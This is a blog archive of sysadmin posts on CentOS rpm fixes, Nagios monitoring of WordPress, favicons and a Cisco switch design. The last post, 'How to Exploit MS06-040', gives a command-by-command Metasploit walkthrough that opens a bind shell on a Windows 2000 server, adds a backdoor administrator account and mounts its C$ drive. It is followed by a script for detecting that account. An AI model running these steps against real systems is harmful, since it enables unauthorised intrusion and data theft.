If a White Box rpm is newer than the CentOS one, it won’t get upgraded; this might cause problems when installing new packages via yum. To solve the problem, download the rpm manually from http://www.centos.org/modules/tinycontent/index.php?id=13 and force an upgrade

rpm --force -Uvh Something-CentOS.rpm

UPDATE: If you’re using something like Rootkit Hunter, you will notice a load of MD5 hashes fail; these are White Box rpm’s that didn’t need upgrading, so their binaries don’t match the CentOS builds rkhunter knows about. Before treating a failure as harmless, run rpm -Vf on the file (e.g. rpm -Vf /sbin/init): if it comes back clean, the file still matches the package that owns it and the mismatch is just the build difference, and the fix is to replace that package with the CentOS version. Example rkhunter output:

/sbin/init  [ BAD ]

Find which rpm init belongs to

# rpm -q --whatprovides /sbin/init
SysVinit-2.85-34.3

and upgrade it

wget http://www.mirrorservice.org/sites/mirror.centos.org/4.4/os/i386/CentOS/RPMS/SysVinit-2.85-34.3.i386.rpm
rpm --force -Uvh SysVinit-2.85-34.3.i386.rpm

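Doing the rkhunter clean-up one file at a time gets tedious, so here is an added example (mine, not from the original post) that lists every package still carrying a non-CentOS vendor string and turns the list into URLs on the mirror used above. The real input is `rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH} %{VENDOR}\n'`; the sample below is constructed, and the vendor strings on your box may differ, so check one with `rpm -qi <package>` before trusting the filter. `force_upgrade_verified` pairs the `--force` upgrade with `rpm -K` so a tampered download is refused; it needs rpm, so the sample run does not call it.

```sh
#!/bin/sh
# Added example, not from the original post: after "yum update", list every
# package that is still a White Box build (rkhunter's hash failures all come
# from these) and turn the list into download URLs on the mirror used above.
# Real usage:
#   rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH} %{VENDOR}\n' | foreign_packages | centos_urls

# stdin: "nvra vendor..." per package; stdout: nvra of packages not built by CentOS
foreign_packages() {
    while read -r nvra vendor; do
        if [ "$vendor" != "CentOS" ]; then
            echo "$nvra"
        fi
    done
}

# stdin: nvra per line; stdout: URL of the matching rpm on the mirror
# (assumes the same name-version-release exists there, as it did for SysVinit above)
centos_urls() {
    mirror=${1:-http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS}
    while read -r nvra; do
        echo "$mirror/$nvra.rpm"
    done
}

# Check the signature against the imported CentOS key before a forced upgrade
force_upgrade_verified() {   # force_upgrade_verified file.rpm
    rpm -K "$1" || { echo "signature check failed for $1, not installing" >&2; return 1; }
    rpm --force -Uvh "$1"
}

# Constructed sample of the rpm -qa output; vendor strings are assumptions
SAMPLE='SysVinit-2.85-34.3.i386 White Box Enterprise Linux
yum-2.4.3-1.c4.noarch CentOS
nagios-2.5-1.el4.rf DAG Apt Repository
centos-release-4-4.2.i386 CentOS'

printf '%s\n' "$SAMPLE" | foreign_packages | centos_urls
```

Third-party packages (the DAG one in the sample) show up as well, because their vendor isn’t CentOS either; leave those alone, the point is only the White Box ones.
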
How to Monitor wordpress with Nagios

WordPress, like many web applications, relies on Apache (or something else) to serve the HTTP pages and MySQL to store the data. Your WordPress website is important to you, so you need an external monitoring system to let you know what’s going on.

Nagios is a great, enterprise class, open-source monitoring application, and what you need to do is configure it to represent exactly how WordPress works; if you can get that right you get notified immediately when any piece of the puzzle fails.

I’m going to write up a simple example of how to monitor WordPress and its associated jigsaw pieces, so we’re going to set up one host with appropriate dependent services. Ultimately, you should configure Nagios to suit exactly how your environment works, but hopefully this “how to” will get you started.

Basic Config.
To configure Nagios you need to have services (such as HTTP) associated with hosts; to get started, I’m going to have to assume you have followed another “how to” and have Nagios up and running and monitoring localhost (you can even use my own config generator to get you started ;) ). Basically you should have a generic check-host-alive host.cfg entry like so:

define host{
        use                     generic-host            ; Name of host template to use
        host_name               linickx.com
        alias                   My WebSite
        address                 www.linickx.com
        check_command           check-host-alive
        max_check_attempts      10
        check_period            24x7
        notification_interval   120
        notification_period     24x7
        notification_options    d,r
        contact_groups  admins
        }

The first (and easiest) part of WordPress to monitor is the web server which serves the pages on port 80, so an /etc/nagios/services.cfg entry like the following. Note that host_name must match the host_name of the host definition above (linickx.com), not its address; Nagios resolves the address from the host object.

define service{
	use                             generic-service         ; Name of service template to use
	host_name                       linickx.com
	service_description             HTTP
	is_volatile                     0
	check_period                    24x7
	max_check_attempts              10
	normal_check_interval           1
	retry_check_interval            1
	contact_groups                  admins
	notification_options            w,u,c,r
	notification_interval           960
	notification_period             24x7
	check_command                   check_http
}

Getting Technical.
Have you noticed the deliberate mistake? I’m using resolvable names in my config files; this is deliberate, as my website is on a shared server, and check_http against an IP address is very different to check_http www.linickx.com (the name is what selects the virtual host). But for www.linickx.com to work, DNS needs to be working, so while we are here it makes sense to monitor that as well. In /etc/nagios/checkcommands.cfg add an entry similar to….

# 'check_dns' command definition
define command{
        command_name    check_dns_linickx-com
        command_line    $USER1$/check_dns -H www.linickx.com -a 69.73.189.228
        }

Where the -a IP address is the IP of your “A record”; if you don’t know what that is, dnsstuff.com can find it for you. Because the expected answer is hard-coded, this check goes CRITICAL if your host moves you to a new IP, which on shared hosting is worth knowing about anyway. You can now create a service that uses that command…

define service{
        use                             generic-service         ; Name of service template to use
        host_name                       linickx.com
        service_description             DNS
        is_volatile                     0
        check_period                    24x7
        max_check_attempts              10
        normal_check_interval           5
        retry_check_interval            1
        contact_groups                  admins
        notification_options            w,u,c,r
        notification_interval           960
        notification_period             24x7
        check_command                   check_dns_linickx-com
        }

We have HTTP and DNS monitored; all the WordPress data is stored in a MySQL database, so now you need to monitor that. To do that you need to set up another check command; add the following.

# mySQL command definition
define command{
	command_name    check_mysql
	command_line    $USER1$/check_mysql -H $HOSTADDRESS$ -u $ARG1$ -p $ARG2$
}

This check command will log into the database and report OK if it is working, much better than check_tcp on 3306. Now you can add the following service entry (again with host_name linickx.com; the plugin gets the address from $HOSTADDRESS$):

define service{
	use                             generic-service         ; Name of service template to use
	host_name                       linickx.com
	service_description             mySQL
	is_volatile                     0
	check_period                    24x7
	max_check_attempts              10
	normal_check_interval           5
	retry_check_interval            1
	contact_groups                  admins
	notification_options            w,u,c,r
	notification_interval           960
	notification_period             24x7
	check_command                   check_mysql!USERNAME!PASSWORD
}

For this to work the user will need permission to log in from the Nagios machine; the WordPress codex has you grant “TO wordpressusername@localhost”, which only allows connections from the web server itself. Rather than widen that grant (GRANT ALL on the WordPress database to wordpressusername@NAGIOS-SERVER would hand the whole site database to anyone who can read the Nagios config or the process list on the Nagios box), create a separate account that can do nothing but connect, which is all check_mysql needs:

GRANT USAGE ON *.* TO nagios@NAGIOS-SERVER IDENTIFIED BY 'a-different-password';

where NAGIOS-SERVER is a resolvable name or IP address, and use that account (nagios and its password) in the service definition above. Be aware that -p puts the password on the check_mysql command line, where ps shows it to every local user; newer check_mysql releases accept -f/--file to read it from a client options file instead. Note: don’t forget about firewalls! Make sure that TCP 3306 is open from your Nagios box to the WordPress website, and only from there.

The bit that actually monitors wordpress.
You are now independently checking both HTTPD and MySQL, but what if WordPress can’t actually connect (let’s say wp-config.php is screwed)? Both these checks will pass and Nagios will stay green; what you need to do is monitor a page. If that page works, everything’s fine; if the page fails (and you get the default database connection error page) then Nagios flags an alert. We’re going to add another check command

# 'check linickx.com wordpress' command definition
define command{
        command_name    check_wp_linickx
        command_line    $USER1$/check_http -H $HOSTADDRESS$ -u /blog/about-me -s "About Me"
        }

You can alter this any way you want, but what it does is look for http://$HOSTADDRESS$/blog/about-me (so http://www.linickx.com/blog/about-me) and, if the returned page contains “About Me”, everything is OK. Then define a service on host linickx.com with service_description WordPress and check_command check_wp_linickx, mirroring the HTTP entry above; the dependencies and the serviceextinfo block further down refer to it by that name.

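check_http -s only tells you that the string was missing, not why. The following is an added example, my own code rather than anything from the original post, of a Nagios-style plugin that does the same page check but also recognises WordPress’s own “Error establishing a database connection” page, so the alert names the broken layer. It follows the Nagios plugin API (one line of output; exit 0 OK, 1 WARNING, 2 CRITICAL, 3 UNKNOWN). The third argument is the fetch command, defaulting to curl; the canned pages at the bottom are constructed so the plugin can be exercised offline, and the file name check_wp_page.sh in the comment is an assumption.

```sh
#!/bin/sh
# Added example, not from the original post: a small Nagios-style plugin that does
# what the check_wp_linickx command above does (fetch a page, look for a string)
# but also recognises WordPress's own "Error establishing a database connection"
# page, so the alert says WHICH layer broke instead of a generic "string not found".
# Nagios plugin API: one line of output, exit 0=OK 1=WARNING 2=CRITICAL 3=UNKNOWN.

check_wp_page() {   # check_wp_page URL EXPECTED_STRING [FETCH_CMD]
    url=$1 expect=$2 fetch=${3:-"curl -sf --max-time 10"}
    if [ -z "$url" ] || [ -z "$expect" ]; then
        echo "UNKNOWN - usage: check_wp_page URL STRING [FETCH_CMD]"; return 3
    fi
    body=$($fetch "$url") || { echo "CRITICAL - cannot fetch $url (web server or DNS?)"; return 2; }
    case "$body" in
        *"Error establishing a database connection"*)
            echo "CRITICAL - WordPress at $url cannot reach its database"; return 2 ;;
        *"$expect"*)
            echo "OK - $url contains \"$expect\""; return 0 ;;
        *)
            echo "CRITICAL - \"$expect\" not found in $url"; return 2 ;;
    esac
}

# Constructed responses standing in for the live site; a fetch command gets the URL as $1
page_ok()    { printf '<html><head><title>About Me</title></head><body>About Me, and a blog.</body></html>'; }
page_dberr() { printf '<h1>Error establishing a database connection</h1>'; }
page_down()  { return 7; }   # curl's exit status for "failed to connect"

# In Nagios, with this saved as check_wp_page.sh (assumed name), the command_line would be
#   $USER1$/check_wp_page.sh http://$HOSTADDRESS$/blog/about-me "About Me"
for page in page_ok page_dberr page_down; do
    check_wp_page http://www.linickx.com/blog/about-me "About Me" "$page" || echo "  -> exit status $?"
done
```

The database-error test runs first on purpose: that page never contains the expected string, but checking it first is what turns “string not found” into “WordPress cannot reach its database”.
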
Tidying up with dependencies.
We’ve already established that if either MySQL, HTTP or DNS fails, WordPress will fail, so we want to ensure we don’t get hit with double alerts about the same problem; enter dependencies. In each definition the first host_name/service_description pair is the parent and the dependent_ pair is the service it protects; execution_failure_criteria n means the dependent check still runs whatever state the parent is in, and notification_failure_criteria u,c means its notifications are held back while the parent is UNKNOWN or CRITICAL (a WARNING parent does not hold them back). inherits_parent 1 makes the dependent honour the parent’s own dependencies as well. HTTP is dependent on DNS, so enter the following in /etc/nagios/dependencies.cfg (make sure you have cfg_file=/etc/nagios/dependencies.cfg in /etc/nagios/nagios.cfg)

define servicedependency{
        host_name                       linickx.com
        service_description             DNS
        dependent_host_name             linickx.com
        dependent_service_description   HTTP
        execution_failure_criteria      n
        notification_failure_criteria   u,c
        inherits_parent         1
        }

and WordPress is dependent on HTTP & MySQL, so you need…

define servicedependency{
        host_name                       linickx.com
        service_description             HTTP
        dependent_host_name             linickx.com
        dependent_service_description   WordPress
        execution_failure_criteria      n
        notification_failure_criteria   u,c
        inherits_parent         1
        }

define servicedependency{
        host_name                       linickx.com
        service_description             mySQL
        dependent_host_name             linickx.com
        dependent_service_description   WordPress
        execution_failure_criteria      n
        notification_failure_criteria   u,c
        inherits_parent         1
        }

You can check your config with nagios -v /etc/nagios/nagios.cfg; assuming you have no errors, wait for the checks to go green and begin testing. Tests can be anything from unplugging the cable from your Nagios box to simulate a complete failure, to stopping the MySQL service on your website to make sure check_mysql works.

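Before unplugging cables it helps to know what the three dependency blocks above will actually do. The following is an added example (my own, not part of the original post) that models the two rules in play, notification_failure_criteria u,c and inherits_parent 1, and prints which of the four services would page you for a given set of states; service names are the ones from the config above, and the states come from shell variables named STATE_<service>.

```sh
#!/bin/sh
# Added example, not part of the original post: a hand evaluation of the three
# servicedependency blocks above, to see which alerts Nagios would actually send
# for a given set of service states. Two rules are modelled:
#   notification_failure_criteria u,c  - a parent in UNKNOWN or CRITICAL suppresses
#                                        the dependent's notification; WARNING does not
#   inherits_parent 1                  - the parent's own failed dependencies count too
# Service states are read from shell variables STATE_<service> (default OK).

# Parents of each dependent service, exactly as in dependencies.cfg
parents_of() {
    case "$1" in
        HTTP)      echo "DNS" ;;
        WordPress) echo "HTTP mySQL" ;;
        *)         echo "" ;;
    esac
}

state_of() { eval "printf '%s' \"\${STATE_$1:-OK}\""; }

# notification_failure_criteria u,c
blocks_notification() {
    case "$1" in UNKNOWN|CRITICAL) return 0 ;; *) return 1 ;; esac
}

# True (0) when a parent of SVC, or through inherits_parent an ancestor, blocks it
dependency_failed() {
    for parent in $(parents_of "$1"); do
        if blocks_notification "$(state_of "$parent")"; then return 0; fi
        if dependency_failed "$parent"; then return 0; fi
    done
    return 1
}

# "ok" (nothing to send), "notify" or "suppressed" for SVC
notification_for() {
    if [ "$(state_of "$1")" = OK ]; then echo ok
    elif dependency_failed "$1"; then echo suppressed
    else echo notify
    fi
}

# Scenario: DNS for the site stops resolving, so every check that uses the name
# goes CRITICAL at once. mySQL still alerts: the config above gives it no
# dependency on DNS, so you get two pages for one fault until you add one.
STATE_DNS=CRITICAL STATE_HTTP=CRITICAL STATE_mySQL=CRITICAL STATE_WordPress=CRITICAL
for svc in DNS HTTP mySQL WordPress; do
    printf '%-10s %-9s %s\n' "$svc" "$(state_of "$svc")" "$(notification_for "$svc")"
done
```

Real Nagios adds one wrinkle the model skips: by default only a parent’s hard state counts (soft_state_dependencies=0), so a parent that has only just failed, still inside its retries, does not yet suppress anything.
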
Making it pretty for the hell of it.
Nagios has a web interface, and one of the things we can do is customise it to represent our config; how about a pretty icon for our website, or a custom WordPress action? Here’s how to set up a pretty icon and an action (a button to click on) for our WordPress service.

To get started you’ll probably need a copy of the WordPress logo from the svn; I then cut the “W” out to make a square icon, but you can do what you like :) Firstly something non-essential: to display any icon in Nagios as a “host icon” (on the status map) you need it in both PNG and GD2 format, so you’ll have to install a conversion tool (for Red Hat):

yum install gd-progs

to run the conversion, use the following…

pngtogd2 wordpress-logo.png wordpress-logo.gd2 0 1

that’ll give you a chunk size of 0 and no compression, as recommended for Nagios.

But if you just want service icons, then you can get away with just a PNG. Save any custom images in /usr/share/nagios/images/logos/, make sure they’re readable by the web server (e.g. chmod 644 file) and we’re good to go.

So, the config file: first make sure you have cfg_file=/etc/nagios/serviceextinfo.cfg enabled in /etc/nagios/nagios.cfg. My serviceextinfo.cfg has the following…

define serviceextinfo{
	host_name               linickx.com
	service_description     WordPress
	notes                   My website  powered by wordpress !
	icon_image              wordpress-w.png
	icon_image_alt          WordPress
	action_url              http://$HOSTADDRESS$/blog/wp-admin/
}

What this does is add my wordpress-w icon to the Nagios status pages and give me a “red star” type action icon which, when clicked, takes me to my WordPress admin page… cool!

Some compulsory screen-shots: [Nagios host detail example] [Nagios service detail for WordPress]

That should just about wrap it up: one fully monitored WordPress installation; as you can see, this can be adapted to monitor any PHP/MySQL app :) Please let me know if you have any further suggestions.

Cacti & Nagios – Missing Favicons

Recently I decided to re-organise my bookmarks toolbar, and added links to my Nagios and Cacti installations. I noticed that the favicons were missing.

For Cacti there’s a how to, but I found it a little overkill – I didn’t need step 2, as my Cacti install is an rpm from dag, and I didn’t bother with step 4, as it worked without it, but hey, ymmv!

Nagios was simpler; how you installed Nagios will affect file permissions, owners, directories etc. Again, I’ve got another dag rpm, so for me I logged in as root,

cd /usr/share/nagios/
wget http://www.nagios.org/images/favicon.ico

then edit index.html: just before </head>, insert

<link rel="shortcut icon" href="/nagios/favicon.ico" type="image/x-icon" />

refresh your browser (delete the cache if necessary), and job done ! :D

Basic Example Cisco Switch Config

Figure 1: Layer 2 Overview

I’ve been meaning to add a dedicated Cisco section to my site for a while; I thought it’d be helpful if I converged my rants with work a little ;) I’m hoping to build up a personal archive of notes for work, and in doing so help others with similar roles & problems. I’ve gone through and added any Cisco related posts to my archive, useful Cisco bookmarks have always been online with del.icio.us, and now to finish off I have a config files directory. Usual rules apply to this and all other posts – see disclaimer.

Moving from a general security reseller to a “cisco cisco cisco” house has meant that templates have become important in my life. Take security products like Checkpoint or Websense: not only are they GUI driven (which makes templating difficult) but their implementation is very specific to their environment, and as such companies that install those from templates usually aren’t doing a very good job. Switches or routers, on the other hand, can be templated, because there are only a few design scenarios (engineers usually stick to a favourite), and once you’re happy with a design, moving it from customer to customer usually only involves changing IPs and passwords (of course a little intelligence to spot what else might need changing also helps).

This is a switch design my boss has handed down; it’s a basic collapsed core (i.e. no distribution layer) site campus implementation. I’m not going to take all the credit for the content, as Frank helped a great deal (thanks mate).

Each access layer switch has two uplinks to the core, and the two core switches are joined by an EtherChannel, which gives the resilient triangle loop – see Figure 1. There are a couple of things you need to pay attention to within this design…

1. The obvious one is that all the layer 3 takes place in the core. There is currently a Cisco document circulating saying we should be pushing layer 3 to the edge to take advantage of QoS for all things new like voice and video; I am aware of these considerations, but I haven’t found them entirely applicable*, which brings me to…
2. The design relies on having two VLANs on each access layer switch. Why? Because in my experience cable and physical faults occur more often (human errors excluded, of course) in Cisco networks than switch failure, so it’s good to have a design whereby all cables carry traffic. If traffic flows down all ports then MRTG can be used to view the usage, and if the “bloke that changes the light bulb” accidentally cuts through a fibre link you’re aware of it… this is much preferable to having a standby link that’s never used/tested fail just as you need it. In short, why two VLANs? So that both paths carry traffic – see Figure 2. *Why do I need QoS on my campus if I have two VLANs, one dedicated to voice and the other to data? ;)

Figure 2: Splitting the VLANs

Hopefully I’ve explained this well enough; if you take a look at the configs you’ll see that, per VLAN, I’ve lined up the active HSRP SVI with the STP root bridge. This ensures that I get the desired traffic flow and distributed processing: if I force the root bridge for a VLAN onto core B, why send its traffic to core A for layer 3? With all the technologies working correctly we have a completely resilient solution.

Mainly for my reference, the example configs have some default security settings; these closely follow the Cisco SAFE blueprint but may need tuning, e.g. if you have a large campus you should be using TACACS+ rather than local usernames and passwords… it’s also important to note that if you don’t know what some of this does, you should probably google for it to find out ;) The configs have been applied to Cat4500/6500 type devices in the core, and a stack of 4 3750s at the edge (access layer). You should be aware that not all functionality is available on all switches; note I’m using VLAN ACLs for RFC 2827 (anti-spoofing ingress) filtering, which probably isn’t available on lesser switches.

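The HSRP/STP alignment is easy to get wrong during a change and nothing in IOS shouts when it drifts. The following is an added example (mine, not from the post or its config files) that reads the text of “show standby brief” and “show spanning-tree root” from one core switch and prints every VLAN where the switch is HSRP Active without being the root bridge, or vice versa. The two sample outputs are constructed, and the column layout they assume is the usual IOS one; compare with your own output before trusting the field positions.

```sh
#!/bin/sh
# Added example, not from the original post or its config files: check that, for
# each VLAN, the core switch that is HSRP Active is also the spanning-tree root,
# which is the property the "two VLANs, both paths carry traffic" design relies on.
# Inputs are the text of "show standby brief" and "show spanning-tree root"
# from ONE core switch; the column layout assumed is the usual IOS one.

# VLAN numbers (interfaces named VlNN) for which this switch is HSRP Active
hsrp_active_vlans() {
    out=$1
    printf '%s\n' "$out" | while read -r line; do
        case "$line" in Vl*) ;; *) continue ;; esac
        # fields: Interface Grp Pri [P] State Active Standby VirtualIP
        set -- $line
        if [ "$4" = "P" ]; then state=$5; else state=$4; fi
        if [ "$state" = "Active" ]; then echo "${1#Vl}"; fi
    done
}

# Every VLAN listed by "show spanning-tree root" (VLAN0010 -> 10)
stp_all_vlans() {
    printf '%s\n' "$1" | sed -n 's/^VLAN0*\([0-9][0-9]*\) .*/\1/p'
}

# VLANs for which this switch is the root bridge (root path cost 0, no root port)
stp_root_vlans() {
    out=$1
    printf '%s\n' "$out" | while read -r line; do
        case "$line" in VLAN[0-9]*) ;; *) continue ;; esac
        # fields: VLANnnnn Prio MAC RootCost Hello MaxAge FwdDly [RootPort]
        set -- $line
        if [ "$4" = "0" ]; then echo "$1" | sed 's/^VLAN0*//'; fi
    done
}

# One line per VLAN where HSRP and STP disagree; silent when the design holds
hsrp_stp_mismatches() {
    active=" $(hsrp_active_vlans "$1" | tr '\n' ' ') "
    root=" $(stp_root_vlans "$2" | tr '\n' ' ') "
    for v in $(stp_all_vlans "$2"); do
        case "$active" in *" $v "*) a=yes ;; *) a=no ;; esac
        case "$root"   in *" $v "*) r=yes ;; *) r=no ;; esac
        if [ "$a" = yes ] && [ "$r" = no ]; then
            echo "VLAN $v: HSRP Active here but the STP root is elsewhere"
        elif [ "$a" = no ] && [ "$r" = yes ]; then
            echo "VLAN $v: STP root here but HSRP is Standby"
        fi
    done
}

# Constructed "show standby brief" from core A: Active for VLANs 10 and 30
STANDBY_A='Interface   Grp  Pri P State   Active          Standby         Virtual IP
Vl10        10   110 P Active  local           10.1.10.3       10.1.10.1
Vl20        20   90  P Standby 10.1.20.3       local           10.1.20.1
Vl30        30   110 P Active  local           10.1.30.3       10.1.30.1'

# Constructed "show spanning-tree root" from core A: root for VLAN 10 only, so the
# access switches for VLAN 30 forward towards core B, which hands the frames across
# the EtherChannel to core A for routing: exactly the detour the design avoids
STP_A='Vlan                   Root ID          Cost    Time  Age Dly  Root Port
---------------- -------------------- --------- ----- --- ---  ------------
VLAN0010          8202 0011.2233.4455         0    2   20  15
VLAN0020          8212 0066.7788.9900      3019    2   20  15  Po1
VLAN0030          8222 0066.7788.9900      3019    2   20  15  Po1'

hsrp_stp_mismatches "$STANDBY_A" "$STP_A"   # VLAN 30: HSRP Active here but the STP root is elsewhere
```

Run it on both core switches: a VLAN that is Active on neither, or root on neither, is a different fault (HSRP or STP not converged) and would show up as a mismatch on whichever side is out of step.
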
Anyway, enjoy !

How to Exploit MS06-040

It would have been irresponsible of me to write this any earlier, but a few days have passed and hopefully the majority have installed the appropriate patch, or at the very least are running personal/perimeter firewalls until they complete their change control.

Many may have seen e-mail alerts and news articles that say “exploit in the wild” and may not appreciate what this actually means. You hear people say “It’ll never happen to me” or “it’s only geeky Linux kids who can do this, my business isn’t at risk”; OK, but do you know how easy it actually is?

Myth Number 1: You need to be Linux literate to hack. It is true that many hacking tools are built for *nix, and many will say they are the best (heck, I’m using Linux now, so I’m not going to argue!) but many tools have been ported to Windows (or Mac if you prefer), and if you think your average help-desk junkie is fairly Windows literate, how difficult is it to point & click? Are you concerned yet?

Myth Number 2: Hacking is hard. Proper hacking, finding exploits in code, yes; but what the public means by hacking, like copying files off your PC, no. I’m going to show you how to use a Windows PC to hack a vulnerable server and create an administrator account, which will allow you to copy the contents of the server’s hard drive.

OK, so “exploit in the wild” means a popular hacking website has published a working exploit; in the case of MS06-040 (the Server service buffer overflow, reachable over SMB on TCP 139/445) Milw0rm did, here. What made this exploit interesting is that it was published as a module for the popular pen testing tool Metasploit, which, yep you guessed it, runs on Windows!

So to get started, download and install Metasploit (I’ll be using Framework 2.6).

Once that’s installed you’ll need to update it with the latest available exploits, so click start -> Metasploit Framework -> msfupdate, and watch it do its thing (for Linux or Mac people you need to run msfupdate -u). During the update you’ll see that it downloads netapi_ms06_040.pm; in the Windows world you have to be quick, as the window closes when it’s finished updating, but Linux users will be able to see that this is the exploit as published on Milw0rm.

Now there is a web GUI to Metasploit Framework, but (i) I didn’t find it that easy to use & (ii) it’s quite difficult to write an article saying point & click :wink:, so to hack (and I use the term loosely) we’re going to use the console, which is a little like a router console: limited commands, not as overwhelming as a full command shell/terminal. So Windows users: start -> Metasploit Framework -> msfconsole (Mac & Linux, just type msfconsole), and you’ll get a black box that looks a little like this:


                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888

+ -- --=[ msfconsole v2.6 [153 exploits - 76 payloads]

 msf >

So to get started, you can just type help to see a list of commands:

msf > help

Metasploit Framework Main Console Help
======================================

        ?            Show the main console help
        cd           Change working directory
        exit         Exit the console
        help         Show the main console help
        info         Display detailed exploit or payload information
        quit         Exit the console
        reload       Reload exploits and payloads
        save         Save configuration to disk
        setg         Set a global environment variable
        show         Show available exploits and payloads
        unsetg       Remove a global environment variable
        use          Select an exploit by name
        version      Show console version

show exploits will give a list of available exploits, and we want netapi_ms06_040, so type use netapi_ms06_040; notice how the prompt has changed:

msf> use netapi_ms06_040
msf netapi_ms06_040 >

Right, the next thing you need is something to attack. I’ve got a Windows 2000 Server SP4 waiting with an IP address of 192.168.10.121, so to tell Metasploit what to attack you need to set a remote host variable. For the unfamiliar, a variable is a word that represents something (I’m not a programmer so sorry for the crap definition), so we’re gonna set the word RHOST to 192.168.10.121:

msf netapi_ms06_040 >set RHOST 192.168.10.121
RHOST -> 192.168.10.121
msf netapi_ms06_040 >

The final thing to do is to set up a payload. A payload is what you want to happen after you’ve exploited; show payloads:

msf netapi_ms06_040 > show payloads

Metasploit Framework Usable Payloads
====================================

  win32_adduser                  Windows Execute net user /ADD
  win32_bind                     Windows Bind Shell
  win32_bind_dllinject           Windows Bind DLL Inject
  win32_bind_meterpreter         Windows Bind Meterpreter DLL Inject
  win32_bind_stg                 Windows Staged Bind Shell
  win32_bind_stg_upexec          Windows Staged Bind Upload/Execute
  win32_bind_vncinject           Windows Bind VNC Server DLL Inject
  win32_downloadexec             Windows Executable Download and Execute
  win32_exec                     Windows Execute Command
  win32_reverse                  Windows Reverse Shell
  win32_reverse_dllinject        Windows Reverse DLL Inject
  win32_reverse_meterpreter      Windows Reverse Meterpreter DLL Inject
  win32_reverse_ord              Windows Staged Reverse Ordinal Shell
  win32_reverse_ord_vncinject    Windows Reverse Ordinal VNC Server Inject
  win32_reverse_stg              Windows Staged Reverse Shell
  win32_reverse_stg_upexec       Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject        Windows Reverse VNC Server Inject

This gives a nice list of what’s available, anything from command shells to full VNC GUIs. I’m going to pick the simplest, which is win32_bind: when successful, this will turn our Metasploit console into a command prompt (start -> run -> cmd.exe) on the attacked machine, thus allowing us to run any commands we like! (A bind shell listens on the target itself, on LPORT, so it only works where nothing is blocking inbound connections to that port; that listener is also what makes it easy to spot.)

 msf netapi_ms06_040 >set PAYLOAD win32_bind
PAYLOAD -> win32_bind
 msf netapi_ms06_040(win32_bind) >

Before we go any further it’s best to check we’ve got everything; the show options command is massively useful because it shows us what settings (or variables) we need before an exploit will work.

msf netapi_ms06_040(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name       Default           Description
  --------    -------    --------------    ---------------------------------------
  required    RHOST      192.168.10.121    The target address
  optional    SMBDOM                       The domain for specified SMB username
  optional    SMBUSER                      The SMB username to connect with
  optional    SMBPASS                      The password for specified SMB username

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

 msf netapi_ms06_040(win32_bind) >

As you can see we set the required RHOST; the others are optional (so we’ll ignore them) and the remaining required ones have defaults :-)

So the final touch is to hack! Type exploit

msf netapi_ms06_040(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.10.119:45064 <-> 192.168.10.121:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Success! (pat yourself on the back!) You now have a working command line; if you’re not that literate with the Windows command line you may think, so what!?! Well, take a look at the following: we’ll set up a user called h4x0r with password P455w0rd, and add him/her to the Administrators group:

C:\WINNT\system32>net user h4x0r P455w0rd /add
net user h4x0r P455w0rd /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators h4x0r /add
net localgroup administrators h4x0r /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
h4x0r
The command completed successfully.

C:\WINNT\system32>

Now we have an administrator on that machine we can pretty much do what we like, so you Windows users can mount the “C” drive as a remote drive and copy & read any file you like. From your PC where Metasploit is installed click start -> run, type cmd.exe (notice how the shell looks the same as the Metasploit one?) and type

net use x: \\192.168.10.121\c$ P455w0rd /user:h4x0r

Finally, Windows people, under “My Computer” on your machine you have an “X” drive of the server you attacked! (Linux users, you’ll have to use Samba to do the same; sorry Mac’ers, I don’t know for you!)

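The flip side of that session is how the server’s owner would notice it. The following is an added example (my own, not from the original post) of the defender’s check: feed it the output of “net localgroup administrators”, captured from the server by whatever job you already run there, plus the list of accounts that should be local administrators, and it prints any that should not be. The sample output is constructed to match the session shown above; the baseline is one account name per line.

```sh
#!/bin/sh
# Added example, not part of the original post: the defender's view of the
# "net localgroup administrators" step above. Given that command's output and a
# baseline of who SHOULD be a local administrator (one name per line), print the
# members that should not be there, so a scheduled job can alert on a new "h4x0r".

# Member names sit between the dashed separator and the "completed" line
admin_members() {
    printf '%s\n' "$1" | tr -d '\r' \
        | sed -n '/^-----/,/^The command completed/p' \
        | sed -e '/^-----/d' -e '/^The command completed/d' -e '/^[[:space:]]*$/d'
}

# Members of the group that are not in the baseline. Comparison is
# case-insensitive, as Windows account names are; names may contain spaces.
unexpected_admins() {
    baseline="|$(printf '%s\n' "$2" | tr '[:upper:]' '[:lower:]' | tr '\n' '|')"
    admin_members "$1" | while read -r member; do
        lower=$(printf '%s' "$member" | tr '[:upper:]' '[:lower:]')
        case "$baseline" in
            *"|$lower|"*) ;;
            *) echo "$member" ;;
        esac
    done
}

# Constructed sample, matching the output shown in the post
NET_OUTPUT='Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
h4x0r
The command completed successfully.'

BASELINE='Administrator'

unexpected_admins "$NET_OUTPUT" "$BASELINE"   # prints: h4x0r
```

Where you have the security log, the same event is recorded directly (event 636, Security Enabled Local Group Member Added, on Windows 2000/2003; 4732 from Vista/2008 on), which catches the addition at the moment it happens rather than at the next scheduled run.
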
In Summary
